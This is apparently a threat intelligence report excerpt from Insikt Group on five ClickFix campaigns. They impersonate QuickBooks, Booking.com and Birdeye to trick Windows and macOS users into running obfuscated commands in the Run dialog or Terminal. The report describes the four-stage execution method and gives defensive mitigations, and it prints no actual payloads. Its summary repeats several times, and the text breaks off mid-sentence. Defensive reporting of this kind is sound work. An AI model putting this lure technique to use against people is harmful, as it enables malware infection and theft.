ClickFix Campaigns Targeting Windows and macOS

Insikt Group identified five distinct ClickFix social engineering clusters impersonating QuickBooks, Booking.com, and Birdeye, targeting Windows and macOS users since May 2024. This technique tricks victims into manually executing obfuscated commands via native system tools like Windows Run dialog or macOS Terminal, enabling in-memory code execution that bypasses traditional browser and endpoint security controls. The campaign demonstrates operational sophistication through OS detection and varied lure themes, while maintaining a consistent four-stage execution framework. ClickFix has evolved into a standardized, high-ROI initial access vector adopted by both cybercriminal and potentially APT groups across accounting, travel, real estate, and legal sectors. Insikt Group assesses this methodology will remain a primary attack vector through 2026. Defenders should disable the Windows Run dialog via GPO, implement PowerShell Constrained Language Mode, and deploy behavioral-based detection rather than relying on indicator blocking.

Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense

Insikt Group identified five distinct ClickFix social engineering clusters impersonating QuickBooks, Booking.com, and Birdeye, targeting Windows and macOS users since May 2024. This technique tricks victims into manually executing obfuscated commands via native system tools like Windows Run dialog or macOS Terminal, enabling in-memory code execution that bypasses traditional browser and endpoint security controls. The campaign demonstrates operational sophistication through OS detection and varied lure themes, while maintaining a consistent four-stage execution framework. ClickFix has evolved into a standardized, high-ROI initial access vector adopted by both cybercriminal and potentially APT groups across accounting, travel, real estate, and legal sectors. Insikt Group assesses this methodology will remain a primary attack vector through 2026. Defenders should disable the Windows Run dialog via GPO, implement PowerShell Constrained Language Mode, and deploy behavioral-based detection rather than relying on indicator blocking. Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense Executive Summary Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impersonating financial application Intuit QuickBooks and the travel agency Booking.com. Insikt Group leveraged the Recorded Future® HTML Content Analysis dataset, which enables systematic monitoring of embedded web artifacts to identify and track new malicious domains and infrastructure. The clusters demonstrate significant operational variance in lure themes and infrastructure patterns, and highlight the technique's evolution, moving past simple verification by visually fooling victims with various fake challenges and demonstrating technical sophistication through operating system detection to tailor execution chains. Despite these structural differences, its operation is largely the same, showing that ClickFix’s core techniques work across platforms and only the social engineering lure needs to be adapted to the victim. Threat actors manipulate victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal. This living-off-the-land (LotL) approach allows malicious scripts to execute in-memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicates that ClickFix has transitioned into a standardized, high-ROI template for both cybercriminal and potentially advanced persistent threat (APT) groups. To protect against these threats, security defenders should move beyond simple indicator blocking and prioritize aggressive behavioral hardening. Key recommendations include disabling the Windows Run dialog box via Group Policy Objects (GPO), implementing PowerShell Constrained Language Mode (CLM), and operationalizing Digital Risk Prevention tools such as Recorded Future's Malicious Websites to identify and mitigate threats to your digital assets. Based on increasing use since 2024, Insikt Group assesses that the ClickFix methodology will very likely remain a primary initial access vector throughout 2026 as threat actors continue to social engineer victims to enable exploitation. Looking ahead, Insikt Group anticipates ClickFix lures will become increasingly technically adaptive, incorporating more selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims into executing malicious commands. Key Findings Insikt Group identified and tracked five distinct ClickFix activity clusters exhibiting significant operational variance in lure themes and infrastructure patterns despite a shared reliance on fraudulent human-verification lures. This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors. While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands. These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and system optimization (macOS). ClickFix technical execution follows a standardized four-stage pattern: input of highly encoded or fragmented strings, native execution via legitimate system...